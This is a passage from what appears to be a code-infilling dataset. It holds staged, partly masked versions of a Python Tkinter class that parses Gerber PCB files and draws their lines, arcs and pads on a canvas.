= move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n temp_list = self.file_commands\n for item in temp_list:\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n 
self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n self.__get_numbers(item)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y +\n 'i', self.x + 'i', self.y + 'i', width=self.\n current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i',\n str(cp_y - radius) + 'i', str(cp_x + radius) +\n 'i', str(cp_y + radius) + 'i', outline='black',\n width=self.current_aperture)\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.\n start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) -\n cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i',\n str(cp_y + radius) + 'i', str(cp_x - radius) +\n 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n",
"step-3": "<mask token>\n\n\nclass GerberCanvas:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {}\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.\n my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.\n HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,\n yscrollcommand=self.y_scrollbar.set)\n self.__part_selected = 0\n\n def load_gerber(self, path, file):\n \"\"\"load gerber file\n :param path: path to the file\n :param file: file name to use\n \"\"\"\n try:\n all_ids = self.my_canvas.find_all()\n if all_ids:\n try:\n for item in all_ids:\n print(item)\n self.my_canvas.delete(item)\n except tk.TclError:\n messagebox.showerror('Error', tk.TclError)\n if path:\n self.file_gto = True\n try:\n with open(os.path.join(path, file), 'r') as gerber_file:\n self.file_commands = gerber_file.read().splitlines()\n except TypeError:\n 
messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_commands)\n self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')\n self.gerber_file_name = file\n self.scaled = False\n if DEBUG:\n print('Scroll region is : ', self.bounding_box_size)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTO')\n finally:\n self.file_gto = False\n self.load_gerber_gtp(os.path.join(path, file))\n self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines(\n )\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n 
self.current_ad_command = key\n if item in key:\n if 'R,' in value:\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x) / 2)\n elif 'C,' in value:\n print(value)\n self.current_aperture = self.__get_circle_diameter(\n value)\n elif 'O,' in value:\n pass\n elif 'P,' in value:\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.\n units_string[GerberCanvas.units], str(y0) +\n GerberCanvas.units_string[GerberCanvas.units], str(\n x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.\n units], outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n if self.file_gto:\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x,\n ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.\n start_y + 'i', self.x + 'i', self.y + 'i', width=\n self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n 
self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x -\n radius) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], outline='black', width=self.\n current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n break\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(\n self.start_y) - cp_y, float(self.start_x) -\n cp_x))\n end_angle = math.degrees(math.atan2(float(self.\n y) - cp_y, float(self.x) - cp_x))\n try:\n self.my_canvas.create_arc(str(cp_x + radius\n ) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], style=tk.ARC, width=self.\n current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline\n ='black')\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = 
value[2:find_x]\n length = value[find_x + 1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y),\n float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = 1 - distance ** 2 / (2 * radius ** 2)\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n i_temp = item[i_start + 1:j_start]\n j_temp = item[j_start + 1:d_start]\n j_temp = str(int(j_temp) * -1)\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n if 'X' and 'Y' in item:\n found = 0\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n x_temp = item[x_start + 1:y_start]\n y_temp = item[y_start + 1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n x_temp = item[x_start + 1:d_start]\n self.x = self.__format_number(x_temp)\n if 'Y' in item and found == 0:\n found = 
1\n y_start = item.find('Y')\n d_start = item.find('D')\n y_temp = item[y_start + 1:d_start]\n y_temp = str(int(y_temp) * -1)\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number) - 5]\n if '-' in number:\n return first + '.' + last\n else:\n return first + '.' + last\n\n def high_lite_part(self, x, y, layer):\n x1 = self.__format_pnp(x)\n y1 = self.__format_pnp(y) * -1\n last_x = float(x1) + 0.1\n last_y = float(y1) + 0.1\n if layer == 'TopLayer':\n color = 'red'\n else:\n color = 'blue'\n self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', \n str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=\n color, fill=color)\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n temp_list = self.file_commands\n for 
item in temp_list:\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n self.__get_numbers(item)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y +\n 'i', self.x + 'i', self.y + 'i', width=self.\n current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i',\n str(cp_y - radius) + 'i', str(cp_x + radius) +\n 'i', str(cp_y + radius) + 'i', outline='black',\n width=self.current_aperture)\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if 
float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.\n start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) -\n cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i',\n str(cp_y + radius) + 'i', str(cp_x - radius) +\n 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n",
"step-4": "<mask token>\nDEBUG = False\n\n\nclass GerberCanvas:\n file_gto = False\n file_gtp = False\n units = 0\n units_string = 'i', 'm'\n \"\"\"\n my canvas\n \"\"\"\n\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {}\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.\n my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.\n HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,\n yscrollcommand=self.y_scrollbar.set)\n self.__part_selected = 0\n\n def load_gerber(self, path, file):\n \"\"\"load gerber file\n :param path: path to the file\n :param file: file name to use\n \"\"\"\n try:\n all_ids = self.my_canvas.find_all()\n if all_ids:\n try:\n for item in all_ids:\n print(item)\n self.my_canvas.delete(item)\n except tk.TclError:\n messagebox.showerror('Error', tk.TclError)\n if path:\n self.file_gto = True\n try:\n with open(os.path.join(path, file), 'r') as gerber_file:\n self.file_commands = 
gerber_file.read().splitlines()\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_commands)\n self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')\n self.gerber_file_name = file\n self.scaled = False\n if DEBUG:\n print('Scroll region is : ', self.bounding_box_size)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTO')\n finally:\n self.file_gto = False\n self.load_gerber_gtp(os.path.join(path, file))\n self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines(\n )\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for 
key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value:\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x) / 2)\n elif 'C,' in value:\n print(value)\n self.current_aperture = self.__get_circle_diameter(\n value)\n elif 'O,' in value:\n pass\n elif 'P,' in value:\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.\n units_string[GerberCanvas.units], str(y0) +\n GerberCanvas.units_string[GerberCanvas.units], str(\n x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.\n units], outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n if self.file_gto:\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x,\n ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.\n start_y + 'i', self.x + 'i', self.y + 'i', width=\n self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n if self.file_gto:\n 
self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x -\n radius) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], outline='black', width=self.\n current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n break\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(\n self.start_y) - cp_y, float(self.start_x) -\n cp_x))\n end_angle = math.degrees(math.atan2(float(self.\n y) - cp_y, float(self.x) - cp_x))\n try:\n self.my_canvas.create_arc(str(cp_x + radius\n ) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], style=tk.ARC, width=self.\n current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline\n ='black')\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = 
value.find('X'[0:len(value)])\n width = value[2:find_x]\n length = value[find_x + 1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y),\n float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = 1 - distance ** 2 / (2 * radius ** 2)\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n i_temp = item[i_start + 1:j_start]\n j_temp = item[j_start + 1:d_start]\n j_temp = str(int(j_temp) * -1)\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n if 'X' and 'Y' in item:\n found = 0\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n x_temp = item[x_start + 1:y_start]\n y_temp = item[y_start + 1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n x_temp = item[x_start + 1:d_start]\n self.x = self.__format_number(x_temp)\n 
if 'Y' in item and found == 0:\n found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n y_temp = item[y_start + 1:d_start]\n y_temp = str(int(y_temp) * -1)\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number) - 5]\n if '-' in number:\n return first + '.' + last\n else:\n return first + '.' + last\n\n def high_lite_part(self, x, y, layer):\n x1 = self.__format_pnp(x)\n y1 = self.__format_pnp(y) * -1\n last_x = float(x1) + 0.1\n last_y = float(y1) + 0.1\n if layer == 'TopLayer':\n color = 'red'\n else:\n color = 'blue'\n self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', \n str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=\n color, fill=color)\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def 
__parse_file_gtp(self):\n temp_list = self.file_commands\n for item in temp_list:\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n self.__get_numbers(item)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y +\n 'i', self.x + 'i', self.y + 'i', width=self.\n current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n 